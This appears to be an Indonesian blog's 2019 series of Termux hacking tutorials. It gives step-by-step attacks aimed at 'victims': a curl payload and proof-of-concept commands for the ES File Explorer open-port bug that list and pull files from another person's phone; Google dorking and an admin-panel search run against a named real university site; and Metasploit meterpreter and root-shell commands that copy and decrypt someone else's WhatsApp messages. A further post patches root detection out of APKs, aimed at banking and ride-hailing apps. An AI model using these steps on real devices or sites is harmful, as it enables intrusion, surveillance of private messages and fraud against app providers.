Tuesday, July 23, 2019

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Akhirnya sampai juga kita di part 15, tidak terasa sudah sejauh ini saya berbagi ilmu sama kalian, senangnya.

Dan karena saya tidak suka panjang lebar (pembaca setia cuman android pasti tau banget nih), mari kita langsung bahas materinya.

Beberapa waktu lalu saya sedang menggunakan termux + distro kali linux, untuk melakukan penstesting ke hape android, dan ketika sedang berjalan-jalan di github, saya menemukan tool untuk memanfaatkan bug di aplikasi ES File Explorer.

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Jadi bugnya ini adalah terdapat port yang terbuka, dan rupanya port tersebut sangat lah vulnerable, jadi tool ini memanfaatkan bug aplikasi tersebut untuk dapat melakukan pentesting atau menyusup ke dalam hape si korban.

Port yang terbuka :

angler:/ # netstat -ap | grep com.estrongs 
tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop

Payload yang di test :

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

Kemudian untuk cara memanfaatkan bugnya itu seperti ini :

Langkah 1 - Pertama download dulu aplikasi ES File Explorer (harus di bawah 4.1.9.7.4), silahkan pasang di hape agan atau di hape lain.

Download di sini

Langkah 2 - Buka termux, kemudian pasang kali linux melalui Anlinux.

Download aplikasi Anlinux melalui Google Playstore, kemudian ikuti tata caranya di situ.

Langkah 3 - Kalau sudah buka kali linux

./start-kali.sh

Langkah 4 - Jika sudah mari kita pasang dulu toolnya, ikuti perintah di bawah ini :

apt-get install python

apt-get install git

git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

cd ESFileExplorerOpenPortVuln

pip install -r requirements.txt

Langkah 5
- Kemudian untuk menggunakannya, agan buka dulu aplikasi ES File Managernya, kemudian baru bisa menggunakan perintah di bawah ini di dalam Termux kali-linux :

python poc.py --cmd PERINTAH/COMMANDS

contoh : python poc.py --cmd appPull


###################### # Available Commands # ######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed

Hasil dari program python poc.py --cmd listFiles

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Hasil dari program python poc.py --cmd listVideos

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Gimana keren kan tutorialnya ?

Dan jika kalian ingin belajar lebih banyak seperti hal di atas, kalian bisa join ke grup telegram Cuman - Android, GRATIS : 

Link : 

Monday, July 8, 2019

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

"Google Hacking, also named Google Dorking, is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use."

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Dorking merupakan teknik hacking yang memanfaatkan search engine (tidak hanya) google untuk menemukan celah, khususnya dalam website, dan ini sangat berbeda dengan teknik Search Engine Optimization yang di gunakan untuk meningkatkan rank.

Teknik ini adalah memanfaatkan google dork list, yaitu list yang di gunakan untuk mencari celah tersebut, dan contohnya itu seperti :
  • ?page=
  • ?id=
  • ?action=
  • .php?id=
  • .php?ID=
  • .php?pageID=
  • .php?file=
  • .php?content=
Dan jika di cari dork di atas menggunakan google search engine, maka hasilnya akan seperti berikut ini : 

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux
Dan dari sana, kita bisa mulai mencari link yang vulnerable.

Karena kita berada di lingkup android, tentu kita harus memanfaatkan penggunaan android sebaik mungkin, maka dari itu tutorial kali ini, akan kita lakukan di Termux - Android.

Jika kalian tidak tau apa itu termux, artikel ini bukan untuk kalian.

Dan saya sarankan, segera kunjungi artikel di bawah ini, untuk mengetahui penjelasan lebih lengkapnya :


Berikut : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux


Langkah 1 - Pertama, kita harus memasang package yang di butuhkan, yaitu lynx, dan curl, caranya seperti biasa, yaitu menggunakan pkg install

pkg install curl

&

pkg install lynx

Langkah 2 - Jika sudah, kemudian lanjutkan dengan mengirim package BinGoo ke dalam termux kita, menggunakan perintah git clone : 


Langkah 3 - Setelah selesai, maka akan muncul folder BinGoo, kemudian masuk ke dalam folder BinGoo, dan jalankan packagenya, dengan mengetikan perintah : 

./bingoo

Langkah 4 - Jika sudah terbuka, akan muncul 6 menu, dan di sini kita fokus dulu ke nomor 1, yaitu google.

Kita akan memanfaatkan dorking google, karena yang paling populer, dan selanjutnya agan bisa inputkan menu 1.

Kemudian, inputkan lagi menu 1 "Single Dork Scan"


Dan lanjutkan dengan pemilihan list dorking, di sini agan bisa menggunakan contoh yang sudah saya beri di atas.

Atau....

Bisa mengikuti saya menggunakan php, saya menggunakan php karena untuk mencegah terlalu banyak hasil.

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Jika sudah, tungggu sampai selesai.

Langkah 5 - Nah, sebenarnya kita belum benar-benar selesai, kita perlu memilah lagi, dan caranya adalah dengan menginputkan kembali menu 2 "Google Link File : g-links.txt"

Perintah tersebut akan menunjukan kepada kita mana link yang "Possible" vulnerable, dan akan menghasilkan output link file g-links.txt ke dalam folder BinGoo.

Maka, nanti hasilnya akan seperti ini nih : 

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Langkah 6 - Nah itu lah cara untuk dorking menggunakan tool BinGoo.

Terus apa yang harus di lakukan selanjutnya ?

Untuk selanjutnya, agan bisa melanjutkan dengan cek urlnya menggunakan sqlmap, atau mencari admin-panel.

Jika ingin menggunakan sqlmap, tapi gak tau caranya, saya sarankan baca tutorial cuman android tentang sqlmap di part ke-7 di sini :


Dan jika ingin tau cara mencari admin panel, seperti ini caranya : 

Langkah 1 - Inputkan menu 5 "Admin Page Finder"

Langkah 2 - Kemudian, inputkan url yang ingin di cari admin panel loginnya, bisa menggunakan link bebas, atau bisa menggunakan link hasil dork.

Di sini saya menggunakan link hasil dork, yaitu http://journals.itb.ac.id/ (sorry untuk menggunakan link anda, kalo gak mau di pake, tingkatin keamanannya, jangan salahkan kami, siapa suruh weak :p)

Langkah 3 - Jika sudah ketemu, hasilnya akan seperti ini nih gan : 

Cara Menggunakan Termux untuk Menengah, Part 14 : Cara Dorking Menggunakan Android Bermodalkan Aplikasi Termux

Nah dari situ, kalian pasti sudah tau apa yang harus di lakukan bukan ?

Masih kurang ilmunya ? kalo kurang, ayo belajar bareng saya, serta 2200 Opreker Android, dan pengguna Termux dari seluruh indonesia di grup Telegram.

Tenang aja, gratis : 

Tuesday, June 18, 2019

Cara Menggunakan Termux untuk Pemula, Part 13 : Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Bagi yang sudah mengikuti tutorial termux yang di sediakan cuman-android, pasti tau kalau saya tidak pernah memasang tema.

Dan sebenarnya, saya pakai tema, tapi karena ribet mengaturnya, akhirnya saya lepas deh.

Tapi karena beberapa waktu lalu ada pembaca cuman-android yang meminta untuk di buatkan tutorial pasang tema, jadi akhirnya saya buatkan.

Cara Menggunakan Termux untuk Pemula, Part 13 : Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Dan untuk memasang tema, tidak sesulit metasploit, ngrok, dan semacamnya, tapi harus tetap di simak dengan baik supaya tidak ada kesalahan.

Pada tutorial kali ini, kita akan menggunakan Termux Ohmyzsh sebagai tool untuk mengganti tema, dan font.

Kemudian, yang nanti agan akan butuhkan adalah ini :
  1. Termux
  2. Curl
  3. Micro (Text Editor), boleh juga nano.

Berikut, Tutorial Cara Mengganti Tema Menggunakan Termux-Ohmyzsh


1. Pertama, kita perlu pasang curl, maka ketikan perintah : 

pkg install curl

2. Kemudian, lanjutkan dengan memasang termux-ohmyzsh, maka ketikan perintah

sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"


Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

3. Tunggu sampai proses pemasangan selesai, maka nanti agan langsung di suruh pilih tema yang agan mau, di sini saya pilih Dracula (nomor 6)

Inputkan nomor 6, kemudian enter

4. Setelah tema maka akan muncul font, pilih yang agan suka, di sini saya menggunakan arimo, maka saya inputkan nomor 1.

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

5. Setelah itu kalian bisa melihat perbedaannya.

Tampilan Error ? mari perbaiki.

6. Masukan perintah di bawah ini :

chcolor

Kemudian ganti dengan tema yang agan suka, karena saya suka permen karet, maka saya pilih peppermint (27).

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

7. Lalu untuk font, masukan perintah di bawah ini :

chfont

Kemudian ganti dengan font yang agan suka, karena web ini menggunakan roboto, maka di termux pun menggunakan roboto (10).


Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

8. Jika sudah maka tampilan akhirnya akan seperti ini :

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Gimana ? gampang bukan ?

Nah itu tadi untuk tema, dan untuk welcome screen begini caranya gan.

Tapi pertama, agan perlu memasang beberapa package, yaitu :
  1. micro (pkg install micro)
  2. ruby (pkg install ruby)
  3. cowsay (pkg install cowsay)
  4. toilet (pkg install toilet)
  5. neofetch (pkg install neofetch)
  6. lolcat (gem install lolcat)

Berikut, Tutorial Cara Memodifikasi Tema Welcome Screen di Termux


1. Untuk bisa mengganti welcome screen, kita perlu mengedit isi file zshrc yang ada di direktori usr/etc , dan caranya seperti ini.

Masukan perintah : 

cd ..

cd usr/etc

micro zshrc


Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Maka akan tampil isi zshrc, kemudian tempatkan kode di bawah ini ke dalam zshrc (seperti pada gambar) : 

clear
echo
echo
cowsay -f eyes Isi Pesan Selamat Datang | lolcat
echo
toilet -f future -F gay "Isi nama agan"
echo
neofetch
echo -e '\033[01;32m'
date
echo -e '\033[01;32m'

Kemudian untuk save, pencet CTRL + S (pada keyboard), dan untuk exit, pencet CTRL + Q (pada keyboard), kalau tidak ada ctrl, gunakan tombol volume bawah.

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Kemudian Exit dari termux, dengan cara ketikan perintah exit lalu enter.

Buka lagi termuxnya, maka tampilannya akan berubah seperti di bawah ini :

Cara Merubah Tampilan Tema, dan Percantik Welcome Screen di Termux

Font untuk toilet (cukup ganti future dengan nama font yang ada di link tersebut) : https://github.com/cacalabs/toilet/tree/master/fonts

Resource : Upgun Tutorial
Part lanjutan untuk belajar termux :

#Part ke 2 :

- Cara Menggunakan Termux untuk Pemula, Part 2 : Pemasangan dan Penggunaan Package di Termux [Guide] - Tanpa Root  

#Part ke 3 :

Cara Menggunakan Termux untuk Pemula, Part 3 : Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

#Part ke 4 :

Cara Menggunakan Termux untuk Pemula, Part 4 : Cara Memasang Hacking Toolbox, dan Menggunakannya (Lazymux) - Tanpa Root

#Part ke 5 :

- Cara Menggunakan Termux untuk Pemula, Part 5 : Nambang Crypto pake Termux - Tnapa Root

#Part ke 6 :

Cara Menggunakan Termux untuk Pemula, Part 6 : Membuat Script Sendiri  - Tanpa Root

#Part ke 7 :

- Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#Part ke 8 :

- Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

#Part ke 9 :

- Cara Menggunakan Termux untuk Menengah, Part 9 : Cara Terbaru Memasang package NGROK di Termux Android [TANPA ROOT]

#Part ke 10 :

- Cara Menggunakan Termux untuk Menengah, Part 10 : Seni menggunakan weeman untuk menjebak seseorang menggunakan Termux (Tanpa Root)

#Part ke 11 :

- Cara Menggunakan Termux untuk Menengah, Part 11 : Cara Paling Halal Mendapatkan Follower Instagram Melalui Termux Android [100% Gratis + Tanpa Root]

#Part ke 12 :

- Cara Menggunakan Termux untuk Expert , Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit 

#Part ke 13 : Belum Rilis

Saturday, June 15, 2019

Cara Menggunakan Termux untuk Expert, Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit (PC+ROOT)

Cara Menggunakan Termux untuk Expert, Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit (PC+ROOT)
Bisakah Whatsapp di Sadap ? potentially NO

Bisakah Whatsapp di bajak ? potentially NO

Bisakah Whatsapp di intip ? YES

Apakah mudah ? NO

Sudah setahun saya, dan anggota grup cuman android belajar bareng di grup telegram, serta di web ini, dan tidak pernah luput dari pertanyaan di atas.

Maka dari itu saya jawab saja sekalian.

Sebenarnya untuk mengintip pesan orang lain (Whatsapp) itu bisa banget, hanya saja terdapat kendala, yaitu terbatasnya alat untuk mengakses file KEY yang ada di root direktori.

karena untuk "mengintip" whatsapp seseorang, minimal kita harus memiliki 2 file penting

  • Ciphertext Key (Paling sulit)
  • Msgstore.db.Crypt

Dan dengan kata lain, supaya kita bisa mencuri kedua file di atas, maka target kita harus lah memiliki hp yang sudah root.

Untuk hp kita sendiri tidak masalah di root atau tidak, pointnya adalah si target kita ini.

Maka dari itu, cara yang sebenarnya tersedia di khususkan untuk hp target yang sudah di root.

Jika agan ingin mencoba, silahkan ikuti tutorial di bawah ini :

Bahan dan Alat Bobol Whatsapp


-Hp Android (termux, metasploit) (gak di root gak masalah)
-PC/Laptop (whatsappviewer)
-Hp Korban sudah di root (untuk tester bisa pake hp sediri, tapi wajib root)

Membuat Payload Menggunakan Metasploit di Termux Sekaligus Proses Mengambil (msgstorage.db.crypt dan cipher text key)


Langkah 1 - Buat payload, bisa pake serveo atau ngrok, dan pastikan sudah terbuat session atau sesi, jika sudah masuk ke sesi tersebut, maka akan muncul : 

meterpreter>

Gak paham ? baca tentang metasploit di sini 

Langkah 2 - Jika sudah muncul, ketikan perintah di bawah ini di meterpreter :

cd /
cd /sdcard/WhatsApp
ls 

Langkah 3 - maka akan muncul direktori whatsapp, kemudian pilih, dan masuk ke direktori Databases

cd Databases

kemudian akan muncul file msgstore.db.crypt

file tersebut tidak harus crypt8, bisa juga crypt12, tinggal di sesuaikan.

Langkah 4 - Kemudian download filenya, dengan mengetik :

download msgstore.db.crypt12 (nomor crypt di sesuaikan.)


Langkah 5 - Selanjutnya adalah memberikan root previlage (maka izinkan) atau akses root.

Pada meterpreter, ketikan shell

shell
su

Langkah 6 - Pastikan telah memilih grant atau izinkan, jika sudah lanjutkan dengan mengetikan perintah berikut secara terurut  : 

cd /
cd /data/data
ls
cd com.whatsapp
ls
cd files
ls
cp key /sdcard/Download

Langkah 7 - Setelah selesai, kita perlu terminate shellnya, dengan cara pencet tombol ctrl + c atau tombol volume bawah + huruf c pada keyboard.

Langkah 8 - Kemudian ketika di tanya "Terminate Channel ? [y/N]" pilih y.

Langkah 9 - Jika sudah keluar dari shell, maka lanjutkan dengan mengetik perintah di bawah ini

cd /sdcard/Download
download key


Nah sekarang kalian sudah mempunyai 2 bahan penting yaitu file crypt, dan key.

Kedua file tersebut ada di halaman utama atau home di termux, untuk memindahkannya kalian bisa memanfaatkan akses termux-setup-storage.

Kemudian pindahkan saja ke folder download atau folder lain yang berada di direktori storage.

Sekarang kirim kedua file tersebut ke pc/laptop kalian.

Proses Membuka (database msgstorage.db.crypt dan cipher text key) Menggunakan Software Whatsapp Viewer. 


Untuk whatsapp viewer caranya cukup gampang

Langkah 1 - Download filenya di bawah ini, kemudian ekstrak, dan extrak lagi file bernama whatsappviewer.zip dan jalankan file .exe nya di pc/laptop kalian.


Langkah 2 - Setelah terbuka, buka 'file' lalu pilih crypt yang sesuai yang agan dapatkan, jika dapatnya crypt12 maka pilih Decrypt.crypt12.


Database File : adalah file msgstore.db.cryptnya
Key File : adalah key yang sudah kita ambil dari root direktori.

lalu pilih oke.

Foto dari forum nullbyte, dan hanya contoh

Langkah 3 - Setelah klik oke, maka nanti agan akan di minta menyimpan file .db.

Nah simpan file tersebut di folder yang agan mau.

Langkah 4 - Setelah itu, buka lagi Whatsapp Viewer > buka 'file' > pilih 'open' > lalu buka file .db yang tadi sudah agan Save atau simpan.

Foto dari forum nullbyte, dan hanya contoh

Hasil

Cara Menggunakan Termux untuk Expert, Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit (PC+ROOT)

Rangkuman dari materi kali ini adalah 

Mengambil msgstorage.db.crypt dan key, kemudian di cek melalui whatsappviewer.

Dan yg paling sulit adalah mengambil key, karena butuh akses root di hp korban.

Kita tidak bisa sadap wa 24/H karena mereka memiliki update/restore database, untuk itu hal tersebut lah yang kita manfaatkan untuk melihat pesan, setidaknya kita masih bisa ngintip bukan ? hehehe.

Materi masih akan berlanjut......

Part lanjutan untuk belajar termux :

#Part ke 2 :

- Cara Menggunakan Termux untuk Pemula, Part 2 : Pemasangan dan Penggunaan Package di Termux [Guide] - Tanpa Root  

#Part ke 3 :

Cara Menggunakan Termux untuk Pemula, Part 3 : Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

#Part ke 4 :

Cara Menggunakan Termux untuk Pemula, Part 4 : Cara Memasang Hacking Toolbox, dan Menggunakannya (Lazymux) - Tanpa Root

#Part ke 5 :

- Cara Menggunakan Termux untuk Pemula, Part 5 : Nambang Crypto pake Termux - Tnapa Root

#Part ke 6 :

Cara Menggunakan Termux untuk Pemula, Part 6 : Membuat Script Sendiri  - Tanpa Root

#Part ke 7 :

- Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#Part ke 8 :

- Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

#Part ke 9 :

- Cara Menggunakan Termux untuk Menengah, Part 9 : Cara Terbaru Memasang package NGROK di Termux Android [TANPA ROOT]

#Part ke 10 :

- Cara Menggunakan Termux untuk Menengah, Part 10 : Seni menggunakan weeman untuk menjebak seseorang menggunakan Termux (Tanpa Root)

#Part ke 11 :

- Cara Menggunakan Termux untuk Menengah, Part 11 : Cara Paling Halal Mendapatkan Follower Instagram Melalui Termux Android [100% Gratis + Tanpa Root]

#Part ke 12 :

- Cara Menggunakan Termux untuk Expert , Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit 

#Part ke 13 : Belum Rilis

Thursday, June 13, 2019

Cara Bypass/Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Beberapa aplikasi, memang ada yang sengaja menanamkan program untuk mengecek akses root.

Dan kalo menurut saya, hal tersebut mereka lakukan untuk melakukan proteksi terhadap aplikasi yang mereka buat.

Karena jika ada akses root, coba tebak hal apa yang bisa kita lakukan ?

Yang jelas adalah

1. Modifikasi
2. Nge-cheat

Dalam kasus ini, biasanya yang menerapkan pengecekan root adalah aplikasi seperti gojek, grab, mobile banking, dan aplikasi lain yang berhubungan dengan aktifitas/pekerjaan.

Karena sudah bukan rahasia lagi, kalo beberapa aplikasi tadi sudah ada yang bisa di modifikasi.

Contohnya pasti kalian pernah dengar kasus cloning akun, titik kordinat, dan semacamnya kan ?

Maka dari itu, untuk menghindari hal tersebut perusahaan menerapkan pengecekan di setiap device.

Tapi, hal tersebut nampaknya percuma, karena pasti tetap bisa di temukan celahnya.

Dan sekarang akan saya contohkan seperti ini :

Jika ada aliran sungai yang bersih, tiba-tiba ada limbah, pasti yang kita cari adalah si pembuat limbah kan ?

Sama halnya dengan bypass/menyembunyikan, jika suatu aplikasi melakukan pengecekan, maka kita hanya perlu mencari "apa" isi dari aplikasi tersebut sehingga bisa melakukan aktifitas seperti itu.

Karena kasusnya root, pertama kita harus tau apa itu root.

Apa itu Root di Android ? 

Cara Bypass/Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager
Root di android adalah proses memasukan file superuser (binari) ke dalam android menggunakan teknik flashing, sehingga akhir dari aktifitas tersebut di sebut dengan native root.

Ingat, memasukan, yang pasti file tersebut berakhir di suatu tempat dong...

Dan karena berakhir di suatu tempat, maka aplikasi yang melakukan pengecekan, pasti nyariin dimana file itu berada.

Ibaratnya seperti Pak RT nyariin alamat rumahnya si budi

pasti yang di cari Pak RT pertama kali itu adalah /nama-jalan/nomor-rumah/no-rt/no-rw baru deh ketemu rumah si budi.

Jika informasi sudah tepat, maka Pak RT pasti bisa menemukan rumahnya si budi dong.

Nah sama halnya dengan pengecekan, aplikasi tersebut mencari dimana file superuser itu berada, dan jika filenya telah di temukan, maka proses pengecekan akan selesai.

Umumnya, jika di temukan akses root ketika menggunakan aplikasi gojek, dan mobile banking, pasti akan langsung di cekal oleh aplikasi tersebut.

Paham ?....

Nah maka dari itu, sekarang saya akan coba membantu agan untuk mempelajari dasar dalam Menyembunyikan root yang ada di aplikasi, dan tenang saja, gak butuh pc, dan xposed.

Berikut Cara Menyembunyikan Akses Root pada Sebuah Aplikasi


Download dulu bahannya, yaitu Aplikasi MT-Manager (Pasang), dan Root Checker (Jangan di pasang) - untuk latihan.

MT-Manager 

Root Checker

Langkah 1 - Kemudian, buka MT-Manager dan cari apk Root Checker, kemudian pencet dan pilih view.

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 2 - Periksa file yang bernama Classes.dex, biasanya file tersebut bisa lebih dari satu, dan namanya ter-urut, contoh Classes2.dex, Classes3.dex.

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 3 - Pilih salah satu classes.dex, dan pilih Dex Editor Plus

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 4 - Pilih satu dulu, jangan gunakan semua Classes.dexnya.

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 5 - Kemudian masuk ke bagian "cari", dan mulai pencarian baru, dan untuk string yang di cari itu antara lain ada : 

  • xbin
  • bin
  • magisk
  • sbin
  • /su/bin
  • busybox
  • Superuser.apk
  • "su"
  • /su"
  • .apk"
  • "sh"


Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 6 - Setelah filenya ketemu (seperti gambar di atas), selanjutnya buka kemudian ganti setiap kata "su" dengan kata-kata random, contoh dari su menjadi sj, sk, sm, atau sl.

Hal ini bertujuan menyembunyikan file superuser yang di cari oleh aplikasi Root Checker.


Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 7 - Setelah semua sudah di ganti, jangan lupa simpan filenya

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 8 - Jika string "su", dan superuser.apk sudah semuanya terhapus, lanjutkan dengan membuka menu pojok kanan atas, dan pilih KOMPIL (jangan pilih "simpan sebagai proyek")

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 9 - Setelah semuanya selesai, tekan tombol back di hp untuk keluar dari editor, selanjutnya pilih simpan, dan keluar.

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 10 - Setelah keluar, jangan langsung pasang apk, kita harus rebuild file apk yang baru saja kita edit, dan di sini, agan cukup pilih "OK"

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 11 - Setelah selesai edit string di dalam classes2.dex, saatnya kita pindah lagi ke file classes.dex, dan lakukan persis dari langkah 3 sampai 10.

Jika classes.dex, dan classes2.dex sudah selesai di edit, maka kita perlu sign file apknya, caranya pencet file apk yang barusan di edit, lalu pilih Fungsi.

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Langkah 12 - Kemudian pilih Sign APK, setelah itu pasang, dan lihat hasilnya.

Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

BERHASIL TIDAK TERDETEKSI ROOT DI APLIKASI ROOT CHECKER


Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager
Cara Menyembunyikan Akses Root yang ada di Dalam Aplikasi Seperti Root Checker Bermodalkan File Manager

Download file Root Checker Modifan :